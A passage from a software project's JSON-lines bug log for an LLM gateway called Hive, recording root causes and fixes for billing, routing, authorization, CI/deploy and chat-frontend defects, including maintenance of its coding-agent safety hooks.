test files import directly", "fix": "bounded openai to <3.0.0 and added httpx as its own direct, version-bounded dependency in packages/sdk-tests/python/pyproject.toml, matching sdk-tests-js's existing caret-pin convention", "tags": ["ci", "python", "sdk-tests", "dependency", "deploy-demo-box", "post-deploy-verification"]} +{"date": "2026-09-01", "title": "Session chat dispatched tool payloads with no capability check at all", "error_message": "OpenRouter 404 No endpoints found that support tool use, reached from the chat surface", "root_cause": "apps/edge-api/internal/chat/dispatch.go called SelectRoute with NeedChatCompletions and NeedStreaming and never set RequireToolCapable, so a tools, tool_choice, response_format or functions payload from Open WebUI was routed as if it were a plain turn. The flag was left unset out of a fear of narrowing the candidate set, and the actual consequence was the opposite: no capability gate at all on that surface, while the API-key surface had one.", "fix": "Publish hive_capabilities.tools per alias on GET /v1/models from catalog.ToolCapableAliases (true only when every enabled route of the alias supports tools), advertise tools only on aliases reporting true, and set RequireToolCapable from inference.ToolParamInBody on the chat path. Filtering an all-capable set is the identity, held by TestAdvertisingToolsNeverNarrowsTheCandidateSet over the folded migration chain. ErrNoToolCapableRoute added so an incapable alias answers 400 rather than 503 routing unavailable.", "tags": ["routing", "tools", "edge-api", "control-plane", "capability", "chat", "issue-1561", "issue-1620", "issue-1621"]} +{"id": "bug-2026-08-26-stream-settle-fail-open", "priority": "P0", "date": "2026-08-26", "error_message": "Streaming settlement failed open: content-delivered streams undercharged from content estimates (deepseek-v4-flash settled 358 credits against a roughly 20x higher non-stream sibling) or settled at zero misfiled as upstream_error 'settle stream delivered nothing' while full content reached the caller (hive-free)", "file": "apps/edge-api/internal/inference/stream.go, apps/edge-api/internal/inference/stream_responses.go", "root_cause": "settleStream inferred delivery only from accumulated state (confirmed usage block or visible content). Frames failing json.Unmarshal into ChatCompletionChunk were forwarded verbatim through the pass-through without accumulating anything, and tool-call-only turns accumulate no content because AccumulateContent ignores tool-call deltas, so both shapes returned delivered=false, released the hold free, and recorded upstream_error over a delivered response. Separately the unconfirmed branch billed a low content estimate instead of capturing the reservation hold.", "fix": "UsageAccumulator.HasForwardedChunk records any forwarded data frame across all four relay branches; settleStream upgrades delivery on it, and on a delivered-but-unconfirmed stream captures reservation.Held() in full with terminal_usage_confirmed=false and status completed, emitting the stream_usage_block_missing error log plus hive_stream_usage_block_missing_total metric. Genuine pre-frame delivery failures still release as upstream_error. Non-stream settlement untouched.", "fix_pr": "fix/stream-settle-fail-open", "tags": ["billing", "streaming", "edge-api", "reservation", "fail-closed", "undercharge", "zero-settle", "usage-block", "tool-calls", "d034"], "related_bugs": ["bug-2026-07-29-disconnect-settle", "bug-2026-07-30-disconnect-settle-round2"], "occurrences": 1, "last_seen": "2026-08-26"} +{"error_message": "issue #967 attributed a real intermittent 20-30s sign-in stall to web-console running in dev mode, citing D-022 and Dockerfile.web-console", "root_cause": "documentation drift: PR #456 (2026-07-26) and PR #605 (2026-07-31) had already migrated the demo box's console-hive.scubed.co to the production web-console-prod service (next build + next start) weeks before the issue was filed, but D-022 and a stale comment in deploy-web-console-workers.yml still described the dev-mode container as current, so the attribution was built on stale docs instead of the container actually serving traffic", "fix": "added D-043 to .wolf/decisions.md recording the supersession with live verification evidence (sub-1.5s responses, no dev-mode HTML markers, green deploy history); no code change, since the migration this task was scoped to make had already shipped", "tags": ["documentation-drift", "web-console", "deploy", "decisions-log", "issue-967"]} +{"id": "bug-2026-08-16-authz-expiry-fail-open-on-parse-error", "date": "2026-08-16", "title": "CheckAccess skipped the API key expiry check on a parse error instead of denying", "error_message": "time.Parse(time.RFC3339, *snapshot.ExpiresAt) guarded with err == nil && exp.Before(time.Now()), so a present-but-unparseable expires_at fell through the if-block entirely and the request was evaluated as if no expiry were set", "root_cause": "The expiry check only executed its deny branch when the timestamp parsed cleanly; a parse failure silently skipped the check rather than being treated as a denial, which is fail-open on an authorization predicate. Not exploitable today: expires_at has one writer (control-plane's ResolveSnapshot), which always emits RFC3339Nano, a format time.Parse(time.RFC3339, ...) already accepts, so reaching this branch would require writing a malformed value directly into the shared Redis auth-snapshot cache, itself a full compromise. Filed as hardening after #915/#919 established expiry enforcement already works via two independent layers.", "fix": "Treat a non-empty expires_at that fails to parse as invalid_api_key (deny), while continuing to treat an empty string the same as a nil pointer (no expiry set, still authorizes). Added TestCheckAccessDeniesUnparseableExpiresAt (confirmed red on unpatched code, green after the fix) plus TestCheckAccessEmptyExpiresAtStillAllowed and TestCheckAccessNilExpiresAtStillAllowed as regression guards for the no-expiry cases.", "tags": ["security", "authz", "fail-open", "hardening", "expiry", "issue-915", "pr-919"], "pr": ""} +{"date": "2026-08-28", "error_message": "Providers, Feature gates and Marketplace console pages rendered a full 200 shell and fetched data for any signed-in customer, and the nav rail advertised all three to every viewer regardless of role", "root_cause": "Client-side nav rendering and page components never checked viewer role/permission; only the underlying control-plane API calls were access-controlled, so a direct URL hit a working page shell before any 403 response arrived", "fix": "Added isPlatformAdminViewer/isWorkspaceAdminViewer predicates in lib/viewer-gates.ts mirroring control-plane's RequirePlatformAdmin and WorkspaceAdminGate; each operator page now calls notFound() server-side before any data fetch; console-shell.tsx filters the Admin nav group per item against the same predicates", "tags": ["security", "console", "rbac", "access-control", "nav"]} +{"id": "bug-web-e2e-cap-kill-diagnostics", "timestamp": "2026-08-23T08:40:00.000Z", "related_bugs": [], "occurrences": 1, "last_seen": "2026-08-23T08:40:00.000Z", "title": "web-e2e uploaded no diagnostics for exactly the runs that needed them", "error_message": "A `web-e2e` run killed by its own `timeout-minutes` cap produced a red required check with no compose log and no Next.js server log attached, only the Playwright report", "root_cause": "GitHub reports a job killed by `timeout-minutes` as cancelled rather than failed, and an `if: failure()` step is skipped on a cancellation. Four of the job's five diagnostic steps carried `if: failure()`; the fifth, the Playwright report upload, carried `always()`, which is why it was the only artifact that ever survived a capped out run", "fix": "Switched the four steps to `always()`. Verified empirically on a throwaway one minute job that slept past its cap (run 32628384742): the job concluded cancelled, its `failure()` step was skipped, and its `always()`, `cancelled()` and `failure() || cancelled()` steps all ran", "tags": ["ci", "github-actions", "observability", "web-e2e", "timeout"]} +{"id": "bug-2026-08-22-pgcron-migrate-deploy-deadlock", "date": "2026-08-22", "title": "deploy-demo-box deadlocked: migrations needed an extension only the skipped deploy job could install", "error_message": "ERROR: could not access file \"$libdir/pg_cron\": No such file or directory, CONTEXT: SQL statement \"SELECT cron.schedule('metering-shadow-verdicts-purge', ...)\" in 20260822_01_metering_retention_pg_cron_schedule.sql", "root_cause": "Two defects compounding. First, the migration gated its CREATE EXTENSION block on pg_available_extensions (files on disk) but its cron.schedule block on pg_extension (a catalog row); a restored production dump carried a pg_cron catalog row into a server whose image lacked the library, so the first block skipped and the second called cron.schedule anyway and aborted as superuser. Second, the migrate job reconciles supabase-db from the box's own clone at /home/sakib/hive, but only the deploy job pulls into that clone, and deploy needs migrate. So the compose change that supplies pg_cron could never reach the job that required it, and every merge re-ran the same circle for three runs.", "fix": "Gate the cron.schedule block on pg_available_extensions as well as pg_extension, so the migration is a genuine no-op where pg_cron is not on disk. Move the Pull latest main step from deploy into migrate, ahead of the supabase-db reconcile step, so the tree is updated before anything builds from it. Regression tests in scripts/test_selfhost_supabase_seam.py assert step ORDER plus the pull/reconcile directory coupling, and the guard test strips SQL comments so it cannot pass on prose.", "tags": ["deploy", "ci", "migrations", "pg_cron", "postgres", "deadlock", "demo-box", "job-ordering", "restored-dump"]} +{"id": "bug-2026-08-22-litellm-config-volume-seeded-once", "date": "2026-08-22", "title": "LiteLLM config edits in the repo never reached the running proxy", "error_message": "No error surfaced. Routes added or repointed in deploy/litellm/config.yaml were silently inert on the demo box; the running container's config carried a top-level general_settings key absent from the repo seed, proving the live file was not the repo file.", "root_cause": "Two compounding staleness bugs. First, docker-compose.yml seeded deploy/litellm/config.yaml into the litellm-config named volume behind `if [ ! -f /etc/litellm/config.yaml ]`, so the copy happened exactly once per volume, and the volume outlives container recreates by design. Second, the seed was bind-mounted as a single FILE, which pins one inode at container start, and git checkout replaces files rather than editing them in place, so even a forced reseed would have copied the pre-pull content. Measured on the box: after a git-style replace, a file-mounted container still read v1 while a directory-mounted one read v2.", "fix": "Mount deploy/litellm as a read-only DIRECTORY at /seed so the path resolves per open. Reconcile the volume in the entrypoint against a sha256 of the seed recorded in the volume, not against the config's mere existence, so a control-plane restart (control-plane merges the DB catalog over the seed, writes the same path, and restarts the container) is a no-op while a genuine repo change is applied. Add a deploy step that restarts litellm on seed drift BEFORE the catalog sync, since `up -d` never recreates a service whose definition did not change and the sync's own restart would otherwise reseed after the merge and discard it. Regression test scripts/test_litellm_config_seam.py executes the real entrypoint shell against temp dirs, wired into make test-scripts.", "tags": ["deploy", "docker-compose", "litellm", "volume", "bind-mount", "inode", "stale-config", "demo-box", "first-boot-seed"]} +{"error_message": "CodeBlock.svelte Save button rendered on every real assistant message despite the component's own save prop defaulting to false", "root_cause": "ResponseMessage.svelte explicitly passed save={!readOnly} to ContentRenderer/CodeBlock, which overrides a component's own default regardless of what that default is; grepping only for a literal save={true} missed this computed-expression override", "fix": "pinned ResponseMessage.svelte to save={false} explicitly, with a comment naming why, in vendor/open-webui/src/lib/components/chat/Messages/ResponseMessage.svelte", "tags": ["owui-fork", "code-block", "props", "chat-frontend"]} +{"error_message": "CreditsBanner.svelte LOW_CREDITS_THRESHOLD (50000) could never trip low/empty banner states after the D-046 credit-unit rescale to 1,000,000,000 credits per dollar", "root_cause": "threshold constant was authored under the pre-D-046 100,000-credits-per-dollar rate and was not updated when D-046 (PR #1106) rescaled every credits column x10000", "fix": "rescaled to 500_000_000 (still $0.50) in vendor/open-webui/src/lib/hive/credits.ts, added a test pinning the threshold to 0.5 * CREDITS_PER_USD so a future rescale that forgets this shows up as a failing assertion", "tags": ["owui-fork", "credits", "d-046", "chat-frontend"]} +{"date": "2026-08-25", "tags": ["audit", "postgres", "serializable", "concurrency", "compliance"], "error_message": "audit.SyncWriter.Write: SQLSTATE 40001 could not serialize access due to read/write dependencies among transactions", "root_cause": "pg_advisory_xact_lock was the first statement inside a SERIALIZABLE transaction; Postgres takes the SERIALIZABLE snapshot at the first statement, not at BEGIN, so a writer blocked on that lock had already formed a stale snapshot before its turn, and SSI aborted the commit once the writer ahead of it committed a conflicting MAX(seq) read", "fix": "acquire the lock as a session-scoped pg_advisory_lock on a dedicated connection BEFORE BeginTx, released with an explicit pg_advisory_unlock after commit, so the transaction cannot take its snapshot until this writer already holds exclusive possession of the lock key"} +{"ts": "2026-08-25", "error_message": "DeepSeek cache_read_price_credits seeded at 0.2x input rate for deepseek-v4-flash (and copied into hive-default), 6x DeepSeek's real published cache-hit/cache-miss ratio", "root_cause": "20260822_02_catalog_alias_restructure.sql's DERIVE block computed deepseek-v4-flash's cache_read multiplier from a wrong basis versus deepseek-v4-pro's row in the same migration (0.2x vs the correct ~1/30); 20260824_02_free_pool_router.sql then copied the same wrong literal into hive-default; the later 10000x unit rescale (20260823_40) preserved the ratio unchanged, confirming a rate error rather than a unit error", "fix": "20260825_02_deepseek_cache_read_price_correction.sql re-derives cache_read_price_credits as CEIL(input_price_credits/30) for deepseek-v4-flash and hive-default only (deepseek-v4-pro already matched the correct rate); pricing.go's stale 0.1x comment corrected to cite DeepSeek's own pricing page (fetched 2026-08-25, ratio 1/30 exact on deepseek-v4-pro)", "tags": ["billing", "pricing", "deepseek", "cache", "migration", "issue-1176"]} +{"error_message": "tool_choice:{\"type\":\"none\"} silently inverted to auto on /v1/messages, plus five other Anthropic request fields (metadata.user_id, disable_parallel_tool_use, top_k, thinking config/blocks, image-drop in tool-calls branch) silently lost by the same field-by-field rebuild", "root_cause": "translate_request.go's convertToolChoice switch had no case for Anthropic's documented \"none\" tool_choice type and fell through to a default that returns \"auto\"; the same field-by-field rebuild pattern that caused the cache_control loss fixed in #1152 dropped five more fields with no representation on MessagesRequest/OAIRequest at all, and convertMessage's block switch had no case for thinking/redacted_thinking blocks so a thinking-only message produced an OAIMessage with empty content and no error", "fix": "added an explicit \"none\" case to convertToolChoice mapping to OpenAI's own \"none\" sentinel; added MessagesRequest.TopK/Thinking, OAIRequest.TopK/Thinking/User/ParallelToolCalls, ToolChoice.DisableParallelToolUse, ContentBlock.Thinking/Signature/Data, and OAIMessage.ThinkingBlocks; wired Metadata.UserID to OAIRequest.User and disable_parallel_tool_use to the inverse parallel_tool_calls=false; widened partsNeedArrayForm to also trigger on any non-text part so an image mixed with a tool call keeps the block-array form instead of flattening away; added a maximal round-trip test asserting every documented MessagesRequest field survives translation as a structural guard against the next field going missing the same way", "tags": ["anthropic", "translate_request", "tool_choice", "thinking", "top_k", "metadata", "parallel_tool_calls", "translator-field-loss"]} +{"error_message": "bash-safety.js hard-blocked read-only commands that merely mention a blocked pattern as quoted text, such as a grep search for a dangerous command name", "root_cause": "The block and warn regexes matched anywhere in the raw command string, including inside quoted search arguments passed to grep, rg, or echo, with no distinction between an actual invocation and a string being searched for or printed.", "fix": "Strip quoted string literals out of the command before running the block and warn regexes against it. A real invocation never needs its own process name quoted.", "tags": ["hooks", "bash-safety", "false-positive", "regression-avoided"]} +{"error_message": "secrets-scanner.js never matched hardcoded secrets assigned with Go's short variable declaration operator, so a hardcoded password or API key using that idiomatic Go form produced no BLOCK and no WARNING", "root_cause": "The password, api_key, secret, and token patterns used a single-character class for the assignment operator. Go's short declaration operator is two characters; the class matches only the first, then the regex requires whitespace or a quote next and gets the second character instead, so the whole pattern fails to match.", "fix": "Widened the single-character class to an alternation that also matches the two-character Go form, in all four patterns, a strict superset of the previous behavior.", "tags": ["hooks", "secrets-scanner", "false-negative", "go", "regression-avoided"]} +{"id": "BUG-2026-08-25-web-e2e-dependabot-secrets", "date": "2026-08-25", "title": "Required Web E2E check failed on every Dependabot PR because Actions secrets are not available to Dependabot-triggered runs", "error_message": "storage unavailable: missing S3_ENDPOINT, S3_ACCESS_KEY, S3_SECRET_KEY, S3_REGION / dependency failed to start: container hive-control-plane-1 is unhealthy", "root_cause": "The web-e2e and interaction-coverage jobs read S3_*, LITELLM_MASTER_KEY and the two E2E fixture passwords from repository Actions secrets. A workflow run triggered by Dependabot receives the Dependabot secret store instead, so every one of those expressions resolved to the empty string. control-plane's loadStorageConfigFromEnv requires five S3 names to be non-empty at boot and exited immediately, so compose never brought the stack up and the required check failed on ten dependency PRs at once, none of which could have caused it.", "fix": "Both jobs now hold no repository secret at all. The object store is stubbed at the discard port (no spec touches an object, and neither Go service dials at startup), the two fixture passwords are generated per run beside the invitation token that already worked that way, and LITELLM_MASTER_KEY is dropped in favour of the compose default both services already share. Guarded by apps/web-console/tests/unit/ci-web-e2e-secret-free.test.ts, which fails on any secrets. reference in either job.", "tags": ["ci", "github-actions", "dependabot", "secrets", "web-e2e", "required-checks", "docker-compose", "control-plane"]} +{"date": "2026-08-14", "error_message": "GET /v1/models returned 401 invalid_api_key for a valid API key immediately after a control-plane container recreate", "root_cause": "authz.Client.Resolve collapsed every resolve failure (transport error, client timeout, canceled context, control-plane 5xx) into the same error as a genuine not-found/revoked verdict; Authorizer.Authorize then mapped any such error to 401 invalid_api_key, and inference.Orchestrator's executeSync/executeStreaming duplicated that mapping inline instead of routing through the shared WriteAuthFailure helper, so the same collapse existed in two places", "fix": "classified resolve failures via a new ErrUpstreamUnavailable sentinel (transport/timeout/cancel/5xx) distinct from a genuine 404/409 verdict; Authorizer now answers a retryable 503 upstream_unavailable instead of 401 for the former; Orchestrator's two duplicated switches now call the shared WriteAuthFailure mapper instead of a second copy of its logic; the OWUI shim-key probe no longer advises rotating a key on a transient resolve timeout; resolve client timeout raised 5s->10s; deploy workflow's post-deploy catalog assertion now retries through a cold start", "tags": ["authz", "edge-api", "control-plane", "false-401", "cold-start", "deploy", "owui-shim-key"]} +{"ts": "2026-08-23", "error_message": "credit unit constant (100_000 per USD) diverged from owner intent (1 billion per USD); unit also duplicated across modules", "root_cause": "magic int64 denominated nowhere in docs or code comments; changing it without migrating stored data would have repriced every request and balance by orders of magnitude", "fix": "atomic change: constants to 1e9 with cent-granularity purchases, marker+PK+RLS-guarded migration rescales every stored credit column x10000 with per-row audit flags, v2 stamping makes stragglers detectable, flat holds and console fallbacks scaled, guard tests pin constants, migration coverage and USD parity", "tags": ["money-path", "billing", "migration", "idempotency"]} +{"bug": "No backup of any production data store since leaving managed Supabase Cloud", "error_message": "single-copy ledger, identities and chat data on one physical box (issue #1000)", "root_cause": "the managed-Supabase exit (#982..#993) moved the data plane onto a bare pgvector container and replaced managed durability with nothing; no dump job, no timer, no off-box copy existed", "fix": "scripts/backup-box.sh plus systemd user timer twice daily, hourly cron staleness watchdog, aes-256-cbc encryption from a chmod 600 passphrase file outside all checkouts, 14-day retention against measured sizes, throwaway restore verification script, off-box encrypted pull helper, runbook at docs/runbooks/box-backup-restore.md", "tags": ["backup", "durability", "postgres", "sqlite", "supabase-storage"]} +{"id": "bug-2026-08-30-data-controls-bulk-writes-silent", "date": "2026-08-30", "title": "Archive All and Delete All reported nothing, whether they worked or not", "error_message": "settings:Data Controls, Archive All and Delete All produced 3 mutations each and no confirmation dialog; nothing was archived or deleted and no request was attempted", "root_cause": "Two separate things. The report itself came from a coverage gate that clicked the button and never clicked Confirm, so no request could have been attempted, and ConfirmDialog appends its element to document.body, which a mutation counter scoped to the settings panel does not see. The real defect underneath: POST /api/v1/chats/archive/all and DELETE /api/v1/chats/ are declared response_model=bool and their model functions catch their own exception and return False, so a bulk write that touched nothing arrives as HTTP 200 with false in the body. Both handlers in DataControls.svelte discarded that body and refetched the list, making a refused write indistinguishable from a completed one. Delete All also left the pinned-chat store untouched, so pinned rows survived on screen after their chats were hard deleted.", "fix": "Added vendor/open-webui/src/lib/hive/bulkChatActions.ts, which checks the returned boolean, unwraps a thrown refusal to the server's own wording, and only navigates and reports success on an accepted write. Both handlers in DataControls.svelte route through it and share one refreshChatLists helper that refetches the pinned list as well as the main one. Added scripts/test_owui_bulk_chat_authz.py, which executes both patched handlers and pins that each writes only the calling user's own chats, with a mutation leg proving the driver runs.", "tags": ["open-webui", "chat", "frontend", "destructive-action", "silent-failure", "issue-866"]} +{"date": "2026-08-29", "issue": 1500, "error_message": "Cowork composer submissions always ran as knowledge-work-pack; a Playwright query for clickable elements matching \"Knowledge work\" returned a count of 0", "root_cause": "ComposerCoworkRow.svelte rendered the pack as a static span and packForMode() in coworkMode.ts returned the constant 'knowledge-work-pack' whatever mode it was given, on the argument that deriving the pack was safer than offering it; the derivation made coding-pack unreachable from the chat surface entirely, leaving the /agents route D-045 retires as the only path to it", "fix": "Replaced the static label with a two segment radiogroup reusing the Chat/Cowork toggle's own classes, backed by a new composerPack store that submitCoworkRun reads at submit time; deleted packForMode and generalised the arrow key handling into one nextInGroup helper both radiogroups share", "tags": ["chat-frontend", "agent-surface", "d-045", "d-061", "dead-control", "open-webui-fork"]} +{"error_message": "hive-fast 404s with model_not_found; failure also leaked LiteLLM fallback-group bookkeeping", "root_cause": "Groq decommissioned llama-3.1-8b-instant after the 2026-08-01 cost migration pinned route-groq-fast to it; separately, WriteProviderBlindUpstreamError's sanitizer only stripped literal provider names/classes, not LiteLLM's routing bookkeeping phrases (fallback model group, Fallbacks=[...], Retried: N times)", "fix": "Reverted route-groq-fast to groq/openai/gpt-oss-20b (confirmed live) and hive-fast pricing to 10500/42000 credits; added providerBlindLooksLikeRoutingInternals() to collapse any message carrying LiteLLM fallback-group bookkeeping to a fixed generic message", "tags": ["routing", "pricing", "provider-blind", "groq", "catalog-drift"]} +{"id": "2026-08-31-searxng-verify-race", "date": "2026-08-31", "title": "Deploy guard verified a container 251ms after recreating it and died on a TCP reset", "error_message": "curl: (56) Recv failure: Connection reset by peer -- Verify the SearXNG engine allow-list is actually live, deploy run 33376226113, exit code 56", "root_cause": "docker compose up -d returns when a container is running, not when it is healthy, and docker-proxy binds the published port immediately. The verify step's single unretried curl ran 251ms after the apply step force-recreated searxng (StartedAt 09:20:47.335, curl 09:20:47.586) and was reset by a uwsgi that had not started listening. The engine allow-list had applied correctly; only the probe was early. A second path to the same race: when the earlier up -d --build recreates searxng on an image bump, the apply step finds the mounted copy current and recreates nothing, so that arm has no wait either.", "fix": "Replaced the single curl in the verify step with a bounded 12-attempt retry loop, the same idiom as the chat-origin Caddy verify step in the same job. Retries cover only the unreachable and unparseable cases; a parsed allow-list that does not match still fails on the first look, since /config is served after settings.yml loads and the port is unbound during a replace, so no stale container can answer a parseable body. Proven still able to fail against a throwaway container with a doctored four-engine config probed with zero gap after start: attempt 1 reproduced the reset and retried, attempt 2 failed loudly listing bing,duckduckgo,stackoverflow,wikipedia.", "tags": ["deploy", "ci", "searxng", "race-condition", "docker-compose", "healthcheck", "verification-guard", "issue-1576"]} +{"date": "2026-08-31", "issue": 1569, "error_message": "chat_web_search_handler and two sibling call sites read error_body.get('detail', ) against Hive's OpenAI-shaped error envelope, which has no top-level detail key", "root_cause": "FastAPI convention (detail) vs Hive's OpenAI-compatible error envelope (error.message) mismatch at the vendored-OWUI/edge-api seam; every upstream failure surfaced as the same hardcoded default, masking real causes including a 401 that cost investigation time on #1567", "fix": "one shared helper _hive_extract_upstream_error_message, applied via deploy/docker/owui-patches/apply_chat_error_detail_1569_patch.py, backing all 3 broken call sites in middleware.py; 2 already-correct readers in main.py and events.py left untouched", "tags": ["owui-patches", "error-handling", "diagnosability", "chat"]} +{"error_message": "could not load your workspace (500) on GET /api/v1/viewer, surfacing as the web console's generic error boundary on the spend-alerts and billing-settings pages", "root_cause": "provisionDefaultWorkspace has no idempotency guard: two concurrent Server Component calls to getViewer() for the same brand-new user both attempt to create a personal workspace with the same deterministic slug, and CreateAccount let the resulting pg unique-violation on accounts.slug escape as a raw 500 instead of recovering the race", "fix": "translate the unique violation into accounts.ErrSlugTaken and have provisionDefaultWorkspace re-check the viewer's own memberships on collision: recover silently if a concurrent request for the same viewer already won, otherwise retry once with a de-duplicated slug for the genuine different-viewer collision case", "tags": ["accounts", "web-e2e", "race-condition", "ci-gate", "flaky-test"]} +{"error_message": "Cursor's shell/edit hooks never triggered bash-safety.js, commit-guard.js, or secrets-scanner.js guards", "root_cause": "All three PreToolUse guards read only the Claude-Code-shaped tool_input.{command,file_path,content/new_string} fields; Cursor's beforeShellExecution/afterFileEdit hooks send a flat payload (top-level command/file_path plus an edits array of {old_string,new_string}), so under Cursor the read always resolved empty and no guard body ever ran. A circulating fix attempted to solve this by inverting the output contract instead (deny via stdout JSON + exit 0 when hook_event_name looked non-empty), which was rejected: Claude Code has set hook_event_name since CLI 1.0.41, so that branch would fire on every Claude Code invocation too and turn every deny into an allow (exit 0), while Cursor's documented exit-code-2 contract already worked correctly and needed no change.", "fix": "Added a flat-payload fallback to the input read in all three guards (data.command / data.file_path fallback, plus a joined edits[].new_string fallback for scanned content in secrets-scanner.js) and left console.log + process.exit(2) untouched. Added hooks.selfcheck.js to exercise both payload shapes for all three guards.", "tags": ["hooks", "cursor", "claude-code", "security", "regression-avoided"]} +{"id": "bug-2026-08-23-owui-login-hop-waste", "date": "2026-08-23", "title": "Repeat OWUI sign-in paid three full HTML document loads and three redirects for one session grant", "error_message": "Anonymous visit to / always rendered /auth before an SSO-only auto-redirect fired, and the OAuth callback's success leg always landed back on /auth (whose only job was converting the token cookie) before a second navigation to /", "root_cause": "The root layout had no auto-redirect decision of its own and no cookie-recovery logic, so every anonymous visitor was pushed through the sign-in page's own SPA route even on a single-provider SSO-only deployment where that page always immediately hands off to the provider anyway; the OAuth callback's backend redirect target was hardcoded to /auth for the same reason, one full document load whose only purpose was to run that same conversion before bouncing to / regardless of outcome.", "fix": "Root layout now consults the existing, already-tested ssoAutoRedirectDecision (the same function the sign-in page uses) before falling through to /auth, and recovers a session from the token cookie itself (via a real getSessionUser server round trip) so the callback's success leg can target / directly. Backend retarget shipped as an asserted source-surgery patch (deploy/docker/owui-patches/apply_oauth_callback_landing_patch.py) since backend edits under vendor/open-webui are otherwise inert in this image build; error leg pinned untouched by the same patch's assertions. A dead GET /api/v1/terminals/ probe on every chat-layout mount was removed in the same pass. Verified live: a local harness built from this PR's own Dockerfile showed 0/3 post-fix runs visiting /auth on an anonymous SSO redirect versus 3/3 pre-fix, and a cookie-only landing on / settling signed in with zero further navigation post-fix versus one full /auth document load plus a client-side bounce pre-fix.", "tags": ["owui", "oauth", "sso", "redirect", "login-latency", "open-webui", "pr-1078"], "pr": 1078} +{"id": "owui-fork-literal-rewrites", "date": "2026-08-17", "area": "deploy/docker", "error_message": "open-webui bundle no longer matches hive_ui_surfaces.py; a removed surface may have come back: sidebar-playground-item, changelog-modal, about-vendor-social-badges", "root_cause": "The exact-literal bundle rewrites match on minified identifiers, which the minifier allocates per chunk. Building the frontend from vendored source renames them, so three of nineteen rewrites stopped matching even though every surface was still present. An identifier-tolerant regex is not a fix: for changelog-modal and about-vendor-social-badges it matched sibling components with identical compiled shape, which would have neutered Settings or the admin dialogue.", "fix": "Remove those surfaces in the vendored source instead, and order the Dockerfile so the rewrite layer still runs against the upstream bundle before the source build replaces it. Retiring the layer entirely is the follow-up.", "tags": ["owui", "fork", "bundle-patch", "minifier", "docker"]} +{"id": "bug-2026-08-29-cowork-summary-rendered-twice", "date": "2026-08-29", "title": "A finished Cowork run rendered its closing sentence twice, once as a muted step line and once as the turn body", "error_message": "No exception. The transcript showed the same sentence twice on every settled run: a muted, single line, ellipsis-truncated copy above the full body plus its code block", "root_cause": "One payload reaching the view by two routes and rendered by two components, not one payload appended twice. The sandbox's closing assistant MessageEvent becomes a task event of kind message carrying a preview (mapSandboxEvent in apps/control-plane/internal/agenttask/eventsync.go), which describeEvent turns into a statusHistory step; the same closing message is what agent_final_response returns, which finishTerminal stores as result_summary_ref (apps/agent-engine/internal/engine/engine.go) and renderRun assigns to the turn's content. StatusHistory.svelte renders only history.at(-1) while collapsed, and the echo is by construction the last step, so the collapsed step list showed precisely the summary", "fix": "dropSummaryEcho(steps, content) in vendor/open-webui/src/lib/hive/coworkMode.ts, applied by Chat.svelte's applyCoworkRun on the two settled paths only, since settling is the only moment the duplicate exists. Whitespace-insensitive comparison because the two routes join an llm_message's content blocks differently; a prefix comparison only for a line carrying the (shortened) marker; only the last match dropped, so intermediate prose and an artifact-URL summary both keep every step", "files": ["vendor/open-webui/src/lib/hive/coworkMode.ts", "vendor/open-webui/src/lib/components/chat/Chat.svelte", "vendor/open-webui/src/lib/hive/coworkMode.test.ts"], "tags": ["chat", "cowork", "open-webui-fork", "rendering", "d-045"], "related_issues": [1509]} +{"id": "console-docs-hivegpt-dead-link", "date": "2026-08-25", "title": "Console Documentation link pointed off-product at hivegpt.io on every page, and no in-product API reference existed", "error_message": "Shell header link href=\"https://hivegpt.io\" rendered on every /console/* page; second copy on the overview page footer", "root_cause": "No hosted docs surface was ever built. The repo generates an OpenAPI contract and a 164-endpoint support matrix under packages/openai-contract/, but deploy/docker/Dockerfile.web-console and .prod copy only apps/web-console/, deploy/, .env.example and supabase/migrations/, so any console route importing from packages/ compiles locally and then breaks the Docker build. That blocker is why the cheap fix was never taken.", "fix": "Added /console/docs generated from the spec and matrix at request time, an unauthenticated /api/openapi.yaml route serving the raw spec, COPY packages/openai-contract/ in both web-console Dockerfiles, and repointed both hivegpt.io links. 12 unit tests guard the extraction count, the base URL against tunnel-ingress.json, and the absence of the off-product link.", "tags": ["web-console", "docs", "openapi", "docker", "dead-link", "issue-1179"]} +{"date": "2026-08-30", "tags": ["chat", "owui", "frontend", "noise", "file-upload"], "title": "Every file picker reported a cancelled dialog as a missing file", "error_message": "File not found. appeared whenever a file dialog was opened and dismissed, including from the chat composer's Upload Files menu entry, which made a working control read as broken", "root_cause": "A cancelled picker fires change with an empty FileList, which is indistinguishable from selecting nothing, and five components carried the same copy-pasted handler treating that as an error. The upload route was never reached, so the message described a lookup that never ran rather than a real gap between the surface and the system.", "fix": "Deleted the empty-selection branch in the knowledge base picker, its drop handler and the model knowledge picker, after the two composers were done in pull request 1375. The admin CSV import keeps a message, since its branch is reachable by submitting with nothing chosen, and now says No file selected. The guard test pins all five files."} +{"error_message": "deploy-demo-box \"Pull latest main\" step: fatal: could not read Username for 'https://github.com': No such device or address (exit 128)", "root_cause": "the demo box's persistent git clone at /home/sakib/hive authenticated its HTTPS remote from a credential external to the workflow (stored PAT or credential helper on the box); that credential worked through the 2026-08-12 20:04 UTC deploy and was gone by the next deploy 17 hours later with no workflow change in between, so it expired or was rotated out from under an unattended git pull with no fallback", "fix": "authenticate the box's own fetch/pull with the deploy job's ephemeral GITHUB_TOKEN via git -c http.extraheader, scoped per-invocation and never persisted to disk, plus GIT_TERMINAL_PROMPT=0 and an explicit ::error:: so a bad credential fails loud instead of an opaque prompt error", "tags": ["ci", "deploy-demo-box", "git", "credentials", "self-hosted-runner"]} +{"id": "BL-1623", "date": "2026-09-02", "title": "Cowork made the customer choose a system prompt before writing the request", "error_message": "Composer required a Knowledge work / Coding selection before a Cowork submission, with no information on which to base it", "root_cause": "The pack was surfaced as a user control because it is a wire field, without checking what the field actually changes: two of the system's components read it, one to pick which AGENTS.md is copied into the working directory and one to gate the deck publish, and everything else about the two sandboxes is identical. The control asked a person to classify their own request against two labels naming a system prompt.", "fix": "Resolve the pack in control-plane Service.CreateTask from the instructions when the caller names none (agenttask.InferPack), keep the explicit field as an override, and disclose the resolved value as the first line of the run's progress chain with a one shot correction in the composer row.", "tags": ["cowork", "agent-tasks", "ux", "inference", "issue-1623"]} +{"id": "BL-1623-B", "date": "2026-09-02", "title": "Pack inference read ordinary business English as a coding request", "error_message": "InferPack routed knowledge-work requests to coding-pack: \"Summarise the 9 a.m. board meeting notes\" (matched a.m as a .m filename), \"cotton yarn price trends for the RMG sector\" (matched the bare term yarn), and \"Summarise this article: https://github.com/blog/...\" (matched github inside the URL). A Skill:-tagged instruction carrying any coding evidence landed 